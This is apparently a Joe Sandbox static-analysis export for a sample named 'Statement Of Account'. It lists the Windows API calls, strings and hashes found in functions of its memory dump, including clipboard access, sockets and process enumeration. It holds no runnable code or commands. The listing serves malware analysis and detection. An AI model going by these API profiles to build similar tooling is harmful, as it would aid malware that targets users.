Function 00459FFF Relevance: 16.6, APIs: 11, Instructions: 114clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 0045A03C
EmptyClipboard.USER32 ref: 0045A042
CloseClipboard.USER32 ref: 0045A048
GlobalAlloc.KERNEL32(00000002,?,?,?), ref: 0045A069

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: de534d37444b5d5f709e846056b03d682512162f818f6bcc40901ff7dbac3813
Instruction ID: bf65fc52a0270df888b24f7b27e9afc9fb3fbce0ff227cc498f9ae4c505a4a2f
Opcode Fuzzy Hash: de534d37444b5d5f709e846056b03d682512162f818f6bcc40901ff7dbac3813
Instruction Fuzzy Hash: 2641E1722002019FD300EF25DD89B1AB7E4FF54315F14886EF945AB2A2E7B9EC44CB99

Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00436162
__swprintf.LIBCMT ref: 00436176

Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F

__wcsicoll.LIBCMT ref: 00436185
FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
LoadResource.KERNEL32(?,00000000), ref: 004361AE
LockResource.KERNEL32(00000000), ref: 004361B5
FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
LoadResource.KERNEL32(?,00000000), ref: 004361E4
SizeofResource.KERNEL32(?,00000000), ref: 004361F0
LockResource.KERNEL32(?), ref: 004361FD

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
String ID:
API String ID: 2406429042-0
Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68

Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D522
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
GetLastError.KERNEL32 ref: 0045D59D
SetErrorMode.KERNEL32(?), ref: 0045D629

Strings

INVALID, xrefs: 0045D5CC
NOTREADY, xrefs: 0045D5DC
READY, xrefs: 0045D5BC
UNKNOWN, xrefs: 0045D5FC
READONLY, xrefs: 0045D5EC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A

Function 0046F50B Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 157nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC

NtdllDialogWndProc_W.NTDLL(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
ReleaseCapture.USER32 ref: 0046F589
SetWindowTextW.USER32(?,00000000), ref: 0046F620
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630

Strings

HH, xrefs: 0046F686
@GUI_DROPID, xrefs: 0046F65F
@GUI_DRAGFILE, xrefs: 0046F694

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AsyncState$CaptureClientCursorDialogMessageNtdllProc_ReleaseScreenSendTextWindow
String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
API String ID: 1737637668-2060113733
Opcode ID: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
Opcode Fuzzy Hash: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA

Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F

Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287

OleInitialize.OLE32(00000000), ref: 0047AE06

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

_wcslen.LIBCMT ref: 0047AE18
CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
CLSIDFromProgID.COMBASE(00000000,?), ref: 0047AFCC
GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9

Strings

HH, xrefs: 0047ADE9

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
String ID: HH
API String ID: 1915432386-2761332787
Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A

Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000F), ref: 00440B7B

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A

Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 004648B0
WSAGetLastError.WS2_32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
bind.WS2_32(00000000,?,00000010), ref: 004648DA
WSAGetLastError.WS2_32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
closesocket.WS2_32(00000000), ref: 0046492D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ErrorLast$bindclosesocketsocket
String ID:
API String ID: 2609815416-0
Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A

Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
Process32NextW.KERNEL32(00000000,?), ref: 00437075
__wsplitpath.LIBCMT ref: 004370A5

Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2

_wcscat.LIBCMT ref: 004370BA
__wcsicoll.LIBCMT ref: 004370C8
CloseHandle.KERNEL32(00000000,?), ref: 00437105

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 2547909840-0
Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A

Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
FindClose.KERNEL32(?,?,00000000), ref: 004522C3

Strings

*.*, xrefs: 0045215E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Find$File$CloseFirstNextSleep_wcslen
String ID: *.*
API String ID: 2693929171-438819550
Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A

Function 0046C5D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 0046C635
IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
GetClipboardData.USER32(0000000D), ref: 0046C64F
CloseClipboard.USER32 ref: 0046C65D
GlobalLock.KERNEL32(00000000), ref: 0046C688
CloseClipboard.USER32 ref: 0046C692
IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
GetClipboardData.USER32(00000001), ref: 0046C6DD
GlobalLock.KERNEL32(00000000), ref: 0046C6EE
GlobalUnlock.KERNEL32(00000000), ref: 0046C726
CloseClipboard.USER32 ref: 0046C866

Strings

HH, xrefs: 0046C625

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
String ID: HH
API String ID: 589737431-2761332787
Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA

Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0043643C
mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
__wcsicoll.LIBCMT ref: 00436466
mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C

Strings

DOWN, xrefs: 00436460

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsicollmouse_event
String ID: DOWN
API String ID: 1033544147-711622031
Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD

Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004647A2: inet_addr.WS2_32(?), ref: 004647C7

socket.WS2_32(00000002,00000002,00000011), ref: 00474213
WSAGetLastError.WS2_32(00000000), ref: 00474233

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D

Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96nativeCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00447997
GetCursorPos.USER32(?), ref: 004479A2
ScreenToClient.USER32(?,?), ref: 004479BE
WindowFromPoint.USER32(?,?), ref: 004479FF
NtdllDialogWndProc_W.NTDLL(?,00000020,?,?), ref: 00447A78

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Client$CursorDialogFromNtdllPointProc_RectScreenWindow
String ID:
API String ID: 4176674648-0
Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA

Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windownativeCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004478A7
TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
GetCursorPos.USER32(?), ref: 00447935
TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CursorMenuPopupTrack$DialogNtdllProc_
String ID:
API String ID: 192203443-0
Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779

